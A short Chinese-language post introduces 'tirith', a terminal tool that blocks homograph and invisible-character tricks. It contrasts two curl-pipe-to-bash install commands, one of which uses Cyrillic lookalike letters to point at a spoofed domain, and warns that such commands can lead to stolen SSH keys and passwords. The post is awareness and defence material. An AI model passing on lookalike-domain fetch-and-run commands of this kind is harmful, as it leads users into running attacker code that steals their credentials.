看到个很有意思的项目。 
仅凭肉眼，你能看出下面两个curl命令的区别吗： 
curl -sSL https://install.example-cli.dev | bash  # safe
curl -sSL https://іnstall.example-clі.dev | bash  # compromised

即便是非常规字体可能也不是一眼的区别。 
 [image] 
第一个I是拉丁字母，而另一个是西里尔字母。在默认的字体下你可能根本看不出来。而在开源库、AI里复制命令的时候，就会有人能利用这种同形异义字攻击进行攻击，导致ssh密钥、密码被盗。 
tirith就是在终端阻止同形异义字、透明字符等行为，避免这种隐患。